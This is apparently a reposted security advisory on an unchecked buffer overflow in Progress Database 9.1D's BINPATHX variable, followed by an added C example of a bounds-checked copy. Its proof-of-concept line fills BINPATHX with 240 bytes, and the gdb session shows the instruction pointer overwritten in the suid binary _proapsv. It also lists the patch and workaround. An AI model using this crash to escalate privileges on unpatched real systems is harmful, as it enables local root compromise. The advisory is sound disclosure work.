COMMAND

    Progress Database unchecked buffer in BINPATHX leads to overflow

SYSTEMS AFFECTED

    v9.1D up to 9.1D05

PROBLEM

    In Secure Network Operations, Inc. Strategic Reconnaissance Team
    advisory SRT2003-04-15-1029 [http://www.secnetops.com]:

    With version 9.1D several things have changed in the Progress
    codebase. One such change is the addition of the BINPATHX variable.
    At first glance, the BINPATHX variable appears to tell Progress
    binaries where to find shared library files and other installation
    files. Unfortunately, while reading the variable no bounds checking
    is done. If an attacker supplies enough data, an overflow will occur,
    thus overwriting critical memory registers including the eip.

    Debugger output

    rootme@gentoo rootme $ export BINPATHX=`perl -e 'print "A" x 240'`
    rootme@gentoo rootme $ gdb -q /usr/dlc/bin/_proapsv
    (gdb) r
    Starting program: /usr/dlc/bin/_proapsv

    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb) bt
    #0  0x41414141 in ?? ()
    Cannot access memory at address 0x41414141

SOLUTION

    Install 9.1D05 or chmod -s all suid binaries.

    http://www.progress.com/patches/patchlst/91D-156v.htm
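
The missing bounds check described under PROBLEM, as an added C example that is not Progress code and not part of the advisory. The buffer size BINPATH_MAX and the function names are assumptions, since the advisory gives neither; the sketch rejects an oversized BINPATHX instead of copying it.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BINPATH_MAX 128 /* assumed size; the advisory does not state the real one */

/* Unchecked pattern of the kind the advisory describes (contrast only, not compiled):
 *     char path[BINPATH_MAX];
 *     strcpy(path, getenv("BINPATHX"));   240 bytes of input run past path[]
 */

/* Copy val into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if val is missing, -2 if it is too long. */
int copy_bounded(const char *val, char *dst, size_t dstlen)
{
    size_t n;

    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (val == NULL)
        return -1;
    n = strlen(val);
    if (n >= dstlen)   /* reject; a truncated path is a different path */
        return -2;
    memcpy(dst, val, n + 1);
    return 0;
}

/* Hardened read of an environment variable into a fixed buffer (hypothetical helper). */
int read_env_bounded(const char *name, char *dst, size_t dstlen)
{
    return copy_bounded(getenv(name), dst, dstlen);
}

int main(void)
{
    char path[BINPATH_MAX];
    int rc = read_env_bounded("BINPATHX", path, sizeof path);

    if (rc == -2) {
        fprintf(stderr, "BINPATHX longer than %d bytes, refusing to start\n",
                BINPATH_MAX - 1);
        return 1;
    }
    printf("BINPATHX: %s\n", rc == 0 ? path : "(unset)");
    return 0;
}
```

Run with the 240-byte value from the debugger session above, this program exits with an error instead of faulting.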